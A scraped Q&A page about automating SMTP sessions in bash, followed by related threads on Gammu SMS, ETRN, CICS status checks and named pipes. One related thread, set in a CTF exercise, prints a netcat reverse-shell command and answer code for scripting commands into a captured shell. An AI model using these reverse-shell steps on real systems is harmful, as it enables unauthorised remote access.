How to test smtp with automated telnet from bash script? - bash

I want to make a bash script that automatically connects to SMTP on port 25, sends an email, and then asserts that the email is queued.
This is the code I have so far:
https://github.com/kristijorgji/docker-mailserver/blob/main/tests/smpt.bash
but it is not working; I always get
improper command pipelining after DATA from unknown[172.21.0.1]: subject: Test 2022-07-22_17_10_09\r\nA nice test\r\n\r\n
That output might even be fine, but please double-check my script and suggest improvements, or fixes if something is wrong.
How can I automate this process so I can re-run the script after every configuration change?
I want to know the best practices.

The PIPELINING extension to ESMTP, which is specified in RFC 2920, says:
The EHLO, DATA, VRFY, EXPN, TURN, QUIT, and NOOP commands can only appear as the last command in a group since their success or failure produces a change of state which the client SMTP must accommodate.
This means that you can remove the sleep commands after mail from and rcpt to, but you should introduce a sleep after echo "data" before continuing with the message which is to be delivered. (Just to be clear: You need to wait for the server's response; sleep is just a hack to achieve that.)
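Reading the server's reply is straightforward in bash. Below is a minimal sketch of a reply reader you could use instead of `sleep`; the function name `wait_for` is my own, not part of the original script:

```shell
#!/usr/bin/env bash
# Minimal SMTP reply reader: consume one full reply from stdin and
# succeed only if its status code matches. Handles multi-line replies
# ("250-PIPELINING" ... "250 OK"); a space after the code marks the
# last line of the reply.
wait_for() {
  local expected="$1" line code
  while IFS= read -r line; do
    code="${line:0:3}"
    [[ "${line:3:1}" == "-" ]] && continue   # continued reply, keep reading
    [[ "$code" == "$expected" ]] && return 0
    printf 'expected %s, got: %s\n' "$expected" "$line" >&2
    return 1
  done
  return 1   # connection closed before a final reply line
}
```

In a script that opens the connection with `exec 3<>/dev/tcp/localhost/25`, you would send with `printf 'data\r\n' >&3` and then call `wait_for 354 <&3` before sending the message body.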

Related

Failed to send SMS with Gammu

As you can tell, I have a problem with Gammu. I'm using Gammu to send SMS in conjunction with PRTG Network Monitor, which monitors networking devices (i.e. servers, switches, routers, firewalls). Whenever one of the important services goes down, PRTG executes batch files I have created, which call Gammu to send SMS.
But whenever one or more services go down, some of the batch files don't get executed at all and I receive the following error:
Error 102 Error opening device. Unknown, busy or no permissions.
I have seen many related topics to this problem, but I couldn't solve my problem through any of them.
I have configured logging for Gammu, so that everything gets logged whatever happens. I have two errors that are showing up in these logs:
[System error - CreateFile in serial_open, 32, "The process cannot access the file because it is being used by another process.
"]
[System error - SetCommState in serial_close, 6, "The handle is invalid. "]
I have a question about the first error, "The process cannot access the file because it is being used by another process.". Which file is it talking about: Gammu or my batch file?
Here is an example of how I set up my batch files:
cd c:\Program Files (x86)\Gammu\bin
Rem User1
gammu sendsms TEXT 0123456789 -text "%*" -report
Rem User2
gammu sendsms TEXT 0123456789 -text "%*" -report
I tried adding a timeout before executing gammu sendsms, but it didn't help at all. Do you have any suggestions on how I can make the execution wait until other processes are finished, so that I don't get that error?
Here is the Gammu config:
[gammu]
device = com4:
connection = at115200
logfile = gammulog
logformat = errors
[gammu1]
device = com3:
connection = at115200
logfile = gammulog
logformat = errors
Thank you in advance.
It looks like one process is locking the device that sends the SMS (the serial port?).
In that case you need to rewrite your script so that it sends those messages sequentially rather than in parallel. Using a queue is the way to go.
One possibility is to have PRTG execute a batch (or Python) script that adds your message to a queue. Another process, running in a loop, would fetch new messages from the queue and process (send) them. That way you never execute Gammu more than once at a time. The disadvantage of this solution is that if you have many alerts it will take longer to send them all, since Gammu doesn't support parallel processing.
Another option is to use an internet SMS gateway that allows you to send many SMS at a time.
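Even a directory with one file per message is enough to serialize the sends. A rough sketch (the file naming, the `send_sms` placeholder, and GNU `date +%s%N` timestamping are my own assumptions, not Gammu specifics):

```shell
#!/usr/bin/env bash
# File-based queue: producers drop one message per file into QUEUE_DIR;
# a single consumer loop sends them oldest-first, so only one send
# (i.e. one Gammu invocation) runs at a time.
QUEUE_DIR="${QUEUE_DIR:-/tmp/sms-queue}"
mkdir -p "$QUEUE_DIR"

enqueue() {   # enqueue "message text"
  # %s%N (GNU date) gives sortable, practically unique file names.
  printf '%s\n' "$1" > "$QUEUE_DIR/$(date +%s%N).msg"
}

send_sms() {  # placeholder for: gammu sendsms TEXT <number> -text "$1"
  printf 'sent: %s\n' "$1"
}

drain_queue() {
  local f
  for f in "$QUEUE_DIR"/*.msg; do   # glob sorts oldest-first
    [ -e "$f" ] || break            # queue is empty
    send_sms "$(cat "$f")" && rm -f "$f"
  done
}
```

In practice the consumer would run `drain_queue` in a loop (e.g. every few seconds, or from the Task Scheduler on Windows), while the PRTG-triggered scripts only ever call `enqueue`.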

How do I create a decent bash script to start an ETRN on a mail-server?

Once in a while, I need to ETRN a couple of backup servers (e.g. after maintenance of my own SMTP server).
Normally, I use telnet for that: I connect to the server, HELO with my own name, and give the ETRN commands. I would like to automate that in a decent way. A simple (but not decent) way would be to feed telnet a here-document, but the problem is that I do not want to send commands out of order (the other end may even drop the connection if I do; I haven't tested that, but even if it works now it may break later, so I'd like a proper solution, not one that may stop working). E.g., I want to wait for the 220 line from the remote SMTP server, then send my HELO, wait for the 250 reply, and only then send the various ETRN commands.
How do I do that in bash? Or do I need to use something else, such as python?
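This can be done in plain bash using its built-in `/dev/tcp` redirection: open the socket on a file descriptor, read replies until you see the code you want, and only then send the next command. A sketch under those assumptions (`mail.example.com`, the HELO name, and the ETRN argument are placeholders; `expect_code` is my own helper, and some servers answer ETRN with 250 or 252):

```shell
#!/usr/bin/env bash
# Drive an SMTP session step by step, waiting for each reply before
# sending the next command.
MAILHOST="${MAILHOST:-mail.example.com}"

expect_code() {   # expect_code <code> <fd>
  local line code
  while IFS= read -r line <&"$2"; do
    [[ "${line:3:1}" == "-" ]] && continue   # multi-line reply, keep reading
    code="${line:0:3}"
    [[ "$code" == "$1" ]] && return 0
    printf 'wanted %s, got: %s\n' "$1" "$line" >&2
    return 1
  done
  return 1
}

run_etrn() {
  exec 3<>"/dev/tcp/$MAILHOST/25" || return 1
  expect_code 220 3 || return 1              # server banner
  printf 'HELO my.host.example\r\n' >&3
  expect_code 250 3 || return 1
  printf 'ETRN backup1.example.com\r\n' >&3
  expect_code 250 3                          # some servers reply 252
  printf 'QUIT\r\n' >&3
  exec 3>&-
}
```

`/dev/tcp` is a bashism (it won't work under plain `sh`); if that is a concern, the same dialogue can be driven with expect or a short Python script instead.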

Reverse shells and bash

I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example
nc -e /bin/bash 10.0.0.2 2546
What I want to do, is to script my way out of this, to make it easier.
Setup a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post about how to hack it or escalate privileges, but my scripting capabilities (especially in bash!) are not the best.
The problem is when I reach step 2. For obvious reasons, I can't start nc -lvp 1234 before sending the post request, since it blocks. And I'm fairly sure multithreading in bash is not possible (...somebody has probably made it work, though).
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say I actually succeed with a connection back home: how would I manage to send data from my script, through netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file and using that as a "buffer"?
I know there are a lot of questions here, and they can't all be answered with one answer, but I'd like to hear how people would do this, OR whether it's completely ridiculous to do in bash.
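Backgrounding the listener with `&` is in fact the usual approach, and the "buffer" idea works well as a named pipe: keep its write end open, push the scripted commands in first, then attach the user's stdin. A sketch of just that plumbing (with a placeholder consumer; in the real run the consumer would be `nc -lp "$LPORT"` and the trigger would be your curl POST):

```shell
#!/usr/bin/env bash
# Plumbing sketch: run a consumer reading from a fifo, feed it scripted
# commands first, then hand the user's stdin over to the same fifo.
run_with_scripted_input() {   # run_with_scripted_input <consumer command...>
  local fifo pid
  fifo=$(mktemp -u)
  mkfifo "$fifo"
  "$@" < "$fifo" &            # real case: nc -lp "$LPORT" < "$fifo" &
  pid=$!
  exec 9>"$fifo"              # hold the write end open
  # Real case: trigger the callback here, e.g.
  #   curl -X POST "$TARGET_URL" --data "in_command=connect_back"
  printf 'id\nsudo -l\n' >&9  # scripted commands go first
  cat >&9                     # then pass the user's stdin through
  exec 9>&-
  wait "$pid"
  rm -f "$fifo"
}
```

The key detail is `exec 9>"$fifo"`: without a persistently open write end, the consumer would see EOF after the first writer exits and the session would close before the user gets their shell.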

How to check the status of a CICS region through a JCL/shell script (unix box)

I want to check whether a mainframe CICS region is active or inactive by using JCL, or, even better, a shell script. The script/JCL will be used to send a mail to a group saying that the region is active/inactive at a scheduled time.
Please help me with the PROC/utility to use in the case of JCL, or with an example shell script to achieve this.
Solution:
I executed the below command on the main screen
TSO STATUS <job-name>
and it told me whether the job is running or not. I have executed the same TSO command in my job and captured the output into a dataset.
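If the captured STATUS output lands in a file on the unix side, deciding active/inactive is a one-line grep. A sketch, with the caveat that the exact wording (`EXECUTING` for a running job) is an assumption to verify against your own system's output, and the `echo` stands in for the real mail step:

```shell
#!/usr/bin/env bash
# Decide active/inactive from captured TSO STATUS output.
region_is_active() {   # region_is_active <status-output-file>
  grep -q 'EXECUTING' "$1"
}

notify() {             # replace the echos with your mail command
  if region_is_active "$1"; then
    echo "CICS region is ACTIVE"
  else
    echo "CICS region is INACTIVE"
  fi
}
```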
Just thinking about this briefly I see three alternatives, all involve use of SDSF (System Display and Search Facility).
SDSF in batch
SDSF from Rexx
SDSF from Java
Note that not all mainframe shops license SDSF, which is an IBM product. There exist ISV alternatives; I am aware of these but unfamiliar with them.
If this were being done in the shop where I work, I'd establish an SSH session with the mainframe and submit a batch job to execute the Rexx code described at the link. The batch job could check the status of the CICS region and send the email. My preference comes from having done all those things previously, I've just not put them together like this.
Your mainframe folks may have a ban on Rexx, or not allow SSH connections to their machine, or be unwilling to set up the Rexx interface to SDSF. They may feel similarly about Java.
There may be security implications: the logon ID and password will be in your script, yes? What will that ID be authorized to do? How will the script be secured? Is the password for the ID required to expire periodically?
All of which is to say that you must work with (probably multiple) mainframe staff in order to make this process function correctly. None of these questions is designed to stop you from accomplishing your goal; your goal must be accomplished without compromising system security and integrity.
Some other things to think about...
Why are you checking to see if the CICS region is up? If it is because, (e.g.) you will begin a batch process to send messages to the region if it is up and notify someone if it is down, then you are best served building the error handling into your batch process instead.
Mainframe shops typically have some automation software in place to notify people when a significant event occurs - bells ring, lights flash, pagers go off, emails are sent, etc. Maybe what you're trying to do is already being handled in a different manner.
A couple of other options:
You can also run the Status (ST) command: just run TSO in batch (IKJEFT01) and issue the STATUS command; see the Status command documentation for the appropriate job names.
You could also try running a CICS command from a batch job; see Batch CEMT New Copy. If it works, CICS is up; if it fails, CICS is not up. I would suggest an inquiry rather than a New Copy, though.
One method is to add a job step to the CICS region. Define this job step to ALWAYS run, or even better define it to run ONLY if the CICS job step fails.
In this job step invoke the program that sends e-mails to everyone in the interested parties group.
This way, when the CICS region abends everyone gets a notification, but if the job is brought down cleanly as part of regular operations, no one gets an e-mail.
Alternatively, you might want to always send out an e-mail when the region comes down regardless of the reasons.
This solution avoids having to poll the region to see if it is up. For example, what happens if the region name is changed? The scripts have to be changed! Or what if a second or third production region is added? Again, all the scripts have to be changed.
Finally, you could add a step zero to the region so that everyone gets notified when the region comes UP!!

Sending information from a bash script to a program

I'm making a bash script to send commands to a launched program, and the only way I found on the internet was through named pipes.
Is there an easier way to do it all inside the same script? Named pipes have the problem that I seem to need three scripts: one to manage the program, another to send the information from the main one, and then a reader to pass the information to the program (if I understood the above link correctly).
And that is a problem, as the manager has to call the others, because I need the reader to receive an array of files as input and I found no way of doing so; if you know how, please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl post I tried
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work: it just spawns vlc and doesn't skip the song.
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter-process communication. Files/pipes/signals/sockets could be used. Write to a specific file in the script, then send the program an interrupt so it knows to check the file, for example.
Depending on your language of choice, and how much time you can spend on this / how big this project will be, you could have the launched program use a thread to listen on a port for TCP packets and react to them. Then your bash script could netcat the information, or send an HTTP POST with curl.
Are you sure it's not possible for the application to be started by the script? Allowing the script to just pass arguments or define some environment variables.
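For the record, the named-pipe approach does not actually need three scripts: one script can create the pipe, launch the program reading from it, and write commands to it. A minimal sketch (the `tr` consumer is a stand-in; for VLC specifically, launching it with the remote-control interface, `vlc -I rc < "$fifo" &`, and writing commands such as `next` into the pipe is an approach worth trying, though that interface is an assumption to verify for your VLC version):

```shell
#!/usr/bin/env bash
# One script: create a fifo, start the program reading from it in the
# background, then send it commands whenever you like.
drive_program() {
  local fifo pid
  fifo=$(mktemp -u)
  mkfifo "$fifo"
  tr 'a-z' 'A-Z' < "$fifo" &   # stand-in; e.g. vlc -I rc < "$fifo" &
  pid=$!
  exec 9>"$fifo"               # keep the write end open between commands
  echo "next" >&9
  echo "quit" >&9
  exec 9>&-                    # close it so the program sees end-of-input
  wait "$pid"
  rm -f "$fifo"
}
```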
